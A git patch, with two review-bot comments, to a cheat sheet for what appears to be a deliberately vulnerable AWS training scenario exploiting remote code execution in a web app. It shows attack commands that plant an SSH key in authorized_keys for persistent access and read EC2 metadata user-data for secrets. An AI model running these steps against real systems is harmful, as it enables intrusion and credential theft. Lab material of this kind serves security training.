From bd00528c1a59feb2872afa98c3fba749edc98f24 Mon Sep 17 00:00:00 2001 From: j0eblow Date: Wed, 30 Jun 2021 13:35:09 -0700 Subject: [PATCH] Correction to Lara cheat sheet The SSH key pair generated for the RCE needs to have a public key that's short enough for the RCE. A long public key, such as an RSA public key generated with ssh-keygen, will get truncated in the RCE and cause the command to fail. Using an ed25519 key pair solves this issue. --- scenarios/rce_web_app/cheat_sheet_lara.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/scenarios/rce_web_app/cheat_sheet_lara.md b/scenarios/rce_web_app/cheat_sheet_lara.md index 9c3c7f20..523bf560 100644 --- a/scenarios/rce_web_app/cheat_sheet_lara.md +++ b/scenarios/rce_web_app/cheat_sheet_lara.md @@ -10,6 +10,8 @@ `aws elbv2 describe-load-balancers --profile Lara` +`ssh-keygen -t ed25519` (An ed25519 key pair is necessary here because using an RSA public key is too long and gets truncated in the RCE) + `echo "public ssh key" >> /home/ubuntu/.ssh/authorized_keys` `curl ifconfig.me` @@ -40,4 +42,4 @@ `curl http://169.254.169.254/latest/user-data` -`psql postgresql://:@:5432/` \ No newline at end of file +`psql postgresql://:@:5432/`
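Review bot: the added `ssh-keygen -t ed25519` line in the first hunk has no `-f`, so the reader is prompted for an output path whose default is `~/.ssh/id_ed25519`, the same file a personal key would occupy. Suggest writing to a dedicated file, for example `ssh-keygen -t ed25519 -f ./lara_key` (the file name is only a suggestion), and changing the placeholder `"public ssh key"` on the following line to say that it means the contents of the matching `.pub` file. The parenthetical would also read better on its own line, reworded to something like "an RSA public key is too long and gets truncated in the RCE", ideally with the length at which truncation was observed so readers can judge whether another key type would fit.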
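Review bot: the second hunk's only change to the `psql postgresql://:@:5432/` line is adding the missing end-of-file newline, which the commit message does not mention. Suggest either noting the whitespace fix in the message or splitting it into its own commit. Since the line is being touched anyway, the URI as shown has empty user, password, host and database fields; if placeholders are intended there, spelling them out visibly would make the step easier to follow.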